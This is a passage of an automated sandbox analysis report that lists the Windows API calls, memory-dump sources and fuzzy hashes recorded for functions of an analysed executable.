                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: 9566f3f0e2837bb5ce99b134e149bce66604c25f3f840261ef2cce9d23b99a99
                    • Instruction ID: 38e63a275d4648b6f322e565288d35395fb31e4348406c1e3388a7cc402fa4cb
                    • Opcode Fuzzy Hash: 9566f3f0e2837bb5ce99b134e149bce66604c25f3f840261ef2cce9d23b99a99
                    • Instruction Fuzzy Hash: 8311727160020DBBDF117F65DC89FEE7778EF48704F044079F918AA152CA7099469B76
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00CD2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: 1b5a6aae2aa495116890cc130fc9dd23896916b8db6292925d7168133ac346ff
                    • Instruction ID: 8c616056d1d25d6b1d1e92365bf5824650899162d81e20540b580db1ba381f29
                    • Opcode Fuzzy Hash: 1b5a6aae2aa495116890cc130fc9dd23896916b8db6292925d7168133ac346ff
                    • Instruction Fuzzy Hash: 59116131900119CFCF00EFA8D9415FEB7B4FF25304B148469D855A7351DB326A16EB51
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CFF910), ref: 00CE903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CFF910), ref: 00CE9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CE91EB
                    • SysFreeString.OLEAUT32(?), ref: 00CE9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: ab786bff64a0f74f1aeb2a034fe50b034d61386bd51c7c3da21b075d06838841
                    • Instruction ID: 6266e12cc5899986551cbc6e621cfde96f3c102f2121839615c1e936706694e0
                    • Opcode Fuzzy Hash: ab786bff64a0f74f1aeb2a034fe50b034d61386bd51c7c3da21b075d06838841
                    • Instruction Fuzzy Hash: 22F14D71A00209EFDF14DF95C888EAEB7B9FF49314F108059F516AB2A1DB71AE46CB50
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CEEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CEEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CEF07E
                    • CloseHandle.KERNEL32(?), ref: 00CEF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 676371735aeb92b47929d747b7582762dcaca21844969e75b21fb7d44d6a28bc
                    • Instruction ID: 7052148ddccaf0c57fb3549b069f1cfecafbb7c11d19d628f7d2f5af807884e1
                    • Opcode Fuzzy Hash: 676371735aeb92b47929d747b7582762dcaca21844969e75b21fb7d44d6a28bc
                    • Instruction Fuzzy Hash: 02815F716043019FD720DF29C886F2AB7E5EF88720F14C82DF599DB292DB70AD459B52
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF0038,?,?), ref: 00CF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF0388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF03C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CF040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 00CF043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00CF0447
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: a7fbecaeb5506606cb7c6d5667dfbba7acdb5afc1ad7913c4d2d48f02b367a43
                    • Instruction ID: 13ebce14edf1a49c11b3ffa6dfd90405e0f346dfcd33dabf888bc825776e0410
                    • Opcode Fuzzy Hash: a7fbecaeb5506606cb7c6d5667dfbba7acdb5afc1ad7913c4d2d48f02b367a43
                    • Instruction Fuzzy Hash: D0512B31208204AFD744EB54C881F7EB7E8FF84714F54892DF69A972A2DB30E905EB52
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CEDC3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CEDCBE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CEDCDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CEDD1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CEDD35
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CD7B20,?,?,00000000), ref: 00C75B8C
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CD7B20,?,?,00000000,?,?), ref: 00C75BB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: 8fd72380e7893ed2bda28b797b39b6d8ffb0608a924c527a36cdc7ad2424bfc0
                    • Instruction ID: dc6682c15601331450075ff32a06d14028958158061e9084827229d85262babe
                    • Opcode Fuzzy Hash: 8fd72380e7893ed2bda28b797b39b6d8ffb0608a924c527a36cdc7ad2424bfc0
                    • Instruction Fuzzy Hash: 43512775A00245DFDB01EF69C8849ADB7F4FF48320B14C069E81AAB361DB70AE45DF91
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CDE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CDE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CDE8F2
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CDE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CDE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: a68aae5eb2a894b5db87f0488ddb08d40c06af85065169d45b68b68c378d3b56
                    • Instruction ID: c248976f9582e1ec72ffb4eebf507111cabf5862fc22c44a22ceb624e44f343a
                    • Opcode Fuzzy Hash: a68aae5eb2a894b5db87f0488ddb08d40c06af85065169d45b68b68c378d3b56
                    • Instruction Fuzzy Hash: B5511A35A00205DFDF11EF64C981AAEBBF5EF48310B14C0A9E949AB362CB31ED11EB51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6055b5f0a6c9c7fbbb1350c3bb2aa90d0d31e49a8d5609e2c611e206bd04bec4
                    • Instruction ID: af6a33bdfd142fab460b2ed1cd9b342b34bc935ee50142d7a18a02d29d36c80f
                    • Opcode Fuzzy Hash: 6055b5f0a6c9c7fbbb1350c3bb2aa90d0d31e49a8d5609e2c611e206bd04bec4
                    • Instruction Fuzzy Hash: 1241BEB5900208AFC760DB28CC48BB9FBA4EB09310F154165EA69A72E1D770EE45DA63
                    APIs
                    • GetCursorPos.USER32(?), ref: 00C72357
                    • ScreenToClient.USER32(00D367B0,?), ref: 00C72374
                    • GetAsyncKeyState.USER32(00000001), ref: 00C72399
                    • GetAsyncKeyState.USER32(00000002), ref: 00C723A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 83e340d6523d07b6f04c90863a919984be4aaf5469d5b25167bb3a76625472ef
                    • Instruction ID: 85939c1ff28b7f7fe67b5be536269ca8eefa7773ce8f273983f2366038021bc4
                    • Opcode Fuzzy Hash: 83e340d6523d07b6f04c90863a919984be4aaf5469d5b25167bb3a76625472ef
                    • Instruction Fuzzy Hash: 6641833550411AFBDF159F69C884BEDBB78FF05324F10831AF938962A0C7345A54EB91
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00CC69A9
                    • TranslateMessage.USER32(?), ref: 00CC69D2
                    • DispatchMessageW.USER32(?), ref: 00CC69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC69EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: 7675846c2a7bd45ba8f30a641d926d519295ba5582d01ff6b5b3843becd8bfa0
                    • Instruction ID: 67cd1905cb4b78a7695bb53659f48dcfb07cde928cdcb9b30c64650216b8e7a2
                    • Opcode Fuzzy Hash: 7675846c2a7bd45ba8f30a641d926d519295ba5582d01ff6b5b3843becd8bfa0
                    • Instruction Fuzzy Hash: 1731D271904246ABDB20CF75CD44FBA7BACEB01304F14816DE431D36A1E734D98AE7A1
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00CC8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00CC8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CC8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00CC8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CC8FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 4d75f60b254818b6a68fc2819f454f9270d87e16fc3582d648a6415e04c39a18
                    • Instruction ID: bac226ee7ce0c1b280dec4cfa9fc75f80b86e07bbf6841ff5f44df990f84486f
                    • Opcode Fuzzy Hash: 4d75f60b254818b6a68fc2819f454f9270d87e16fc3582d648a6415e04c39a18
                    • Instruction Fuzzy Hash: 5E31BF71500219EBDB14CFA8D948BAF7BB6EF44315F10422DF925E62D0CBB09A18DB91
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00CCB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CCB742
                    • _wcsstr.LIBCMT ref: 00CCB74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: cd67218fc0ba2e83d22dce9823ad19c3ad27de2697cbb9a58d2b21ac46e2830e
                    • Instruction ID: 7d13a2d8522260fb6a41927b6bad2261aea9d6ec8ee55d84b986190899dff668
                    • Opcode Fuzzy Hash: cd67218fc0ba2e83d22dce9823ad19c3ad27de2697cbb9a58d2b21ac46e2830e
                    • Instruction Fuzzy Hash: 4621D032204204BAEB255BB9DC4AF7B7BA8DF89760F00402DFC05CA1A1EF61CD4197A1
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CFB44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00CFB471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CFB489
                    • GetSystemMetrics.USER32(00000004), ref: 00CFB4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CE1184,00000000), ref: 00CFB4D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: aa436dedf035ef0838cae7f7a10ea4a1bb4ceecec26d7215aee3cf01e0d0de08
                    • Instruction ID: b8fa10c5787955a8fd5be0f4eb620646a1bcc6f8323c74fc5c0b8da6668fc926
                    • Opcode Fuzzy Hash: aa436dedf035ef0838cae7f7a10ea4a1bb4ceecec26d7215aee3cf01e0d0de08
                    • Instruction Fuzzy Hash: CB218D71910219AFCB508F39CD04B7A3BA4EF09724F158728FA36C62E1E7309D11DB91
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CC9802
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CC9834
                    • __itow.LIBCMT ref: 00CC984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CC9874
                    • __itow.LIBCMT ref: 00CC9885
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 7f2c1c49c8e352e74af8bc72f221c6e3b8dcdc694585907733afa3e356209541
                    • Instruction ID: e20552439adc0f624067b51b3e2bdce35cc1a35b1526582f3a9f644fb2427375
                    • Opcode Fuzzy Hash: 7f2c1c49c8e352e74af8bc72f221c6e3b8dcdc694585907733afa3e356209541
                    • Instruction Fuzzy Hash: 3F219531B00208ABDF109A65CC8EFAE7BA9EF4A710F04402DF905DB291DA708E45D792
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C7134D
                    • SelectObject.GDI32(?,00000000), ref: 00C7135C
                    • BeginPath.GDI32(?), ref: 00C71373
                    • SelectObject.GDI32(?,00000000), ref: 00C7139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 81cd996f42f712decdc2e2cb0ac7c75c5e10da89b8c88dcb5c988c2b834a11bb
                    • Instruction ID: bf604ed3577171a7accc14ad1414201115c47842fd697d5ba402b685811e462e
                    • Opcode Fuzzy Hash: 81cd996f42f712decdc2e2cb0ac7c75c5e10da89b8c88dcb5c988c2b834a11bb
                    • Instruction Fuzzy Hash: CC211B70800304EBDB119F29DC04BA97BA8FB04361F58C22AF924962F1D771D991EBA1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 7a7a381b771c7e96ff096b017ffc7d12648b4dd678876a14b9da21d0791ea429
                    • Instruction ID: 1fe21aabaec7d2f698fb50e87a11d5bffd33d3d68abae2af736231e9ff3d9383
                    • Opcode Fuzzy Hash: 7a7a381b771c7e96ff096b017ffc7d12648b4dd678876a14b9da21d0791ea429
                    • Instruction Fuzzy Hash: 1C0192A2A051067BE605A623DCCAFBF775CDB21394F0C4029FE1C96283E6509E1592F5
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00CD4D5C
                    • __beginthreadex.LIBCMT ref: 00CD4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 00CD4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CD4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CD4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
